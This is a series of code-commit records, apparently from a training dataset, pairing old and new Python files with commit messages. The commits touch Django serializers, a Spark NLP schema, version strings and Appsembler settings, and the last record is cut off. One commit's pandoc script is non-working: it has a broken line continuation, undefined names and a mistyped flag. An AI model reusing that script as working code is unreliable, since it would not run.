class SignatureResource(resources.ModelResource):
class Meta:
exclude = ('created_on', 'modified_on')
model = Signature
<commit_msg>Fix swappable model in signature export<commit_after>from import_export import resources
import swapper
Signature = swapper.load_model("petition", "Signature")
class SignatureResource(resources.ModelResource):
class Meta:
model = Signature
|
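Context for this record: a swappable model can be replaced per-project, so importing `Signature` directly from `petition.models` would bind the resource to the default model even when a project swaps it out. `swapper.load_model()` resolves the concrete class at runtime. A hedged sketch; the setting name below follows swapper's app_label/model naming convention and is an assumption here:

import swapper

# Returns petition.Signature by default, or the model named by the
# PETITION_SIGNATURE_MODEL setting when a project overrides it.
Signature = swapper.load_model("petition", "Signature")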
8851223a1576a4e164449b589f68c0420966d622
|
PythonScript/GenerateBook.py
|
PythonScript/GenerateBook.py
|
#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
|
import subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
Implement GenerateCover using fake vars
|
Implement GenerateCover using fake vars
|
Python
|
mit
|
fan-jiang/Dujing
|
#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
Implement GenerateCover using fake vars
|
import subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
<commit_before>#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
<commit_msg>Implement GenerateCover using fake vars<commit_after>
|
import subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
Implement GenerateCover using fake varsimport subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
<commit_before>#Set Cover=Cover
#Set BookCover=%BookName%%Cover%
#Set BookCoverHTML=%BookCover%%HTMLExt%
#Call pandoc ..\source\%BookCover%%BookExt% -o %BookCoverHTML% --standalone %CSS_%%Cover%%CSSExt% --verbose
def GenerateCover():
pass
if __name__ == '__main__':
GenerateCover()
<commit_msg>Implement GenerateCover using fake vars<commit_after>import subprocess
def GenerateCover():
Cover = "Cover"
BookName = "BookName"
BookCover = BookName + Cover
BookExt = "BookExt"
HTMLExt = "HTMLExt"
BookCoverHTML = BookCover + HTMLExt
CSS = "CSS_"
CSSExt = "CSSExt"
pandocCommand = "pandoc ..\\source\\" + BookCover + BookExt + " -o "
+ BookCoverHTML + " -standalone " + CSS_ + Cover + CSSExt + " --verbose"
subprocess.call(pandocCommand, stdout=FNULL, stderr=FNULL, shell=False)
if __name__ == '__main__':
GenerateCover()
|
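One remark on the pandoc call in this record: building a single shell string by concatenation is fragile once paths contain spaces. A safer sketch passes an argument vector and silences output explicitly, assuming pandoc is on PATH; the file names below are the commit's own fake placeholders, and `--css` is an assumption about how the stylesheet argument is meant to be passed:

import os
import subprocess

def generate_cover(book_cover="BookNameCover", book_ext=".md",
                   html_ext=".html", css_file="CSS_Cover.css"):
    # List form avoids shell quoting problems entirely.
    cmd = ["pandoc", os.path.join("..", "source", book_cover + book_ext),
           "-o", book_cover + html_ext,
           "--standalone", "--css", css_file, "--verbose"]
    with open(os.devnull, "w") as devnull:
        subprocess.call(cmd, stdout=devnull, stderr=devnull)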
795d76074b0d8336ebe29b3816186732d29c0cd2
|
deployer/__init__.py
|
deployer/__init__.py
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
Update to next dev version
|
Update to next dev version
|
Python
|
mit
|
totem/cluster-deployer,totem/cluster-deployer,totem/cluster-deployer
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
Update to next dev version
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
<commit_before>from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
<commit_msg>Update to next dev version<commit_after>
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
Update to next dev versionfrom __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
<commit_before>from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.0'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
<commit_msg>Update to next dev version<commit_after>from __future__ import absolute_import
import deployer.logger
from celery.signals import setup_logging
__version__ = '0.5.1'
__author__ = 'sukrit'
deployer.logger.init_logging()
setup_logging.connect(deployer.logger.init_celery_logging)
|
2b7a703aab3e07cee82a0b1cc494dab71d7c22df
|
bin/build-scripts/write_build_time.py
|
bin/build-scripts/write_build_time.py
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
Use correct latest commit in __version__ endpoint
|
Use correct latest commit in __version__ endpoint
|
Python
|
mpl-2.0
|
mozilla-services/pageshot,mozilla-services/screenshots,mozilla-services/pageshot,mozilla-services/pageshot,mozilla-services/screenshots,mozilla-services/screenshots,mozilla-services/screenshots,mozilla-services/pageshot
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
Use correct latest commit in __version__ endpoint
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
<commit_before>#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
<commit_msg>Use correct latest commit in __version__ endpoint<commit_after>
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
Use correct latest commit in __version__ endpoint#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
<commit_before>#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--always"]).strip()
<commit_msg>Use correct latest commit in __version__ endpoint<commit_after>#!/usr/bin/env python
import time
now = time.time()
formatted = time.strftime("%B %d, %Y %H:%M:%S UTC", time.gmtime())
print 'exports.string = %r' % formatted
# Note Javascript uses milliseconds:
print 'exports.timestamp = %i' % int(now * 1000)
import subprocess
print 'exports.gitrevision = %r' % subprocess.check_output(
["git", "describe", "--tags", "--always"]).strip()
|
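Why `--tags` matters in this record: plain `git describe` only matches annotated tags, so a repository that versions with lightweight tags would fall straight through to the bare `--always` hash. With `--tags`, lightweight tags are considered too. A quick check in the script's own style, run from inside any git repository:

import subprocess

# Falls back to an abbreviated commit hash only when no tag (annotated
# or lightweight, thanks to --tags) is reachable from HEAD.
print(subprocess.check_output(["git", "describe", "--tags", "--always"]).strip())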
3a57d826a957b864753895d8769dcf747d489e1b
|
administrator/serializers.py
|
administrator/serializers.py
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
Remove category serializer from subcategory serializer
|
Remove category serializer from subcategory serializer
|
Python
|
apache-2.0
|
belatrix/BackendAllStars
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
Remove category serializer from subcategory serializer
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
<commit_before>from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
<commit_msg>Remove category serializer from subcategory serializer<commit_after>
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
Remove category serializer from subcategory serializerfrom categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
<commit_before>from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
category = CategorySerializer(read_only=True, many=True)
class Meta:
model = Subcategory
<commit_msg>Remove category serializer from subcategory serializer<commit_after>from categories.models import Category, Keyword, Subcategory
from rest_framework import serializers
class SubcategoryListSerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name')
class CategorySerializer(serializers.ModelSerializer):
subcategories = SubcategoryListSerializer(many=True, source='subcategory_set')
class Meta:
model = Category
fields = ('pk', 'name', 'weight', 'is_active', 'comment_required', 'subcategories')
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
class SubcategorySerializer(serializers.ModelSerializer):
class Meta:
model = Subcategory
fields = ('pk', 'name', 'is_active')
|
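Two things happen in this record's diff: the reverse-pointing `category = CategorySerializer(read_only=True, many=True)` field is dropped (`category` on a subcategory is presumably a single foreign key, so `many=True` would misfire at serialization time), and an explicit `fields` whitelist is added. A stand-in sketch of the resulting output shape, using a plain DRF `Serializer` so it runs without models; the minimal `settings.configure()` is only there so the imports work outside a project:

import django
from django.conf import settings

settings.configure()  # minimal config so DRF imports cleanly outside a project
django.setup()

from rest_framework import serializers

class SubcategorySketch(serializers.Serializer):
    # Mirrors the trimmed fields = ('pk', 'name', 'is_active')
    pk = serializers.IntegerField()
    name = serializers.CharField()
    is_active = serializers.BooleanField()

# Prints the three whitelisted fields and nothing else.
print(SubcategorySketch({"pk": 4, "name": "Backend", "is_active": True}).data)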
0960ca60effa80ca52a715d30f9651741c3b9800
|
python/sparknlp/annotation.py
|
python/sparknlp/annotation.py
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
Fix Python dataType Annotation [skip travis]
|
Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]
|
Python
|
apache-2.0
|
JohnSnowLabs/spark-nlp,JohnSnowLabs/spark-nlp,JohnSnowLabs/spark-nlp,JohnSnowLabs/spark-nlp
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
<commit_before>from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
<commit_msg>Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]<commit_after>
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
<commit_before>from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotator_type', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
<commit_msg>Fix Python dataType Annotation [skip travis]
Fix in python dataType for Annotation [skip travis]<commit_after>from pyspark.sql.types import *
class Annotation:
def __init__(self, annotator_type, begin, end, result, metadata, embeddings):
self.annotator_type = annotator_type
self.begin = begin
self.end = end
self.result = result
self.metadata = metadata
self.embeddings = embeddings
def __str__(self):
return "Annotation(%s, %i, %i, %s, %s)" % (
self.annotator_type,
self.begin,
self.end,
self.result,
str(self.metadata)
)
def __repr__(self):
return self.__str__()
@staticmethod
def dataType():
return StructType([
StructField('annotatorType', StringType(), False),
StructField('begin', IntegerType(), False),
StructField('end', IntegerType(), False),
StructField('result', StringType(), False),
StructField('metadata', MapType(StringType(), StringType()), False),
StructField('embeddings', ArrayType(FloatType()), False)
])
@staticmethod
def arrayType():
return ArrayType(Annotation.dataType())
|
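The rename in this record is load-bearing: Spark resolves struct fields by name, so the Python-side schema must spell `annotatorType` exactly as the JVM-side annotation schema does, or data exchanged through UDFs is mismatched. The schema itself can be inspected without a SparkSession, assuming a local pyspark install:

from pyspark.sql.types import StructType, StructField, StringType, IntegerType

schema = StructType([
    StructField('annotatorType', StringType(), False),
    StructField('begin', IntegerType(), False),
])
# Field names are part of the type; a mismatch like 'annotator_type'
# would produce a different, incompatible schema.
print([f.name for f in schema.fields])  # ['annotatorType', 'begin']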
30cf33413086f558a07638aadf8b38f6e887a7fc
|
openedx/core/djangoapps/appsembler/settings/settings/devstack_lms.py
|
openedx/core/djangoapps/appsembler/settings/settings/devstack_lms.py
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
customer_themes_dir = path.join(settings.COMPREHENSIVE_THEME_DIRS[0], 'customer_themes')
if path.isdir(customer_themes_dir):
settings.STATICFILES_DIRS.insert(0, customer_themes_dir)
|
"""
Settings for Appsembler on devstack/LMS.
"""
from os import path
from openedx.core.djangoapps.appsembler.settings.settings import devstack_common
def plugin_settings(settings):
"""
Appsembler LMS overrides for devstack.
"""
devstack_common.plugin_settings(settings)
settings.DEBUG_TOOLBAR_PATCH_SETTINGS = False
settings.SITE_ID = 1
settings.EDX_API_KEY = "test"
settings.ALTERNATE_QUEUE_ENVS = ['cms']
settings.USE_S3_FOR_CUSTOMER_THEMES = False
if settings.ENABLE_COMPREHENSIVE_THEMING:
assert len(settings.COMPREHENSIVE_THEME_DIRS) == 1, (
'Tahoe supports a single theme, please double check that '
'you have only one directory in the `COMPREHENSIVE_THEME_DIRS` setting.'
)
# Add the LMS-generated customer CSS files to the list
# LMS-generated files look like: `appsembler-academy.tahoe.appsembler.com.css`
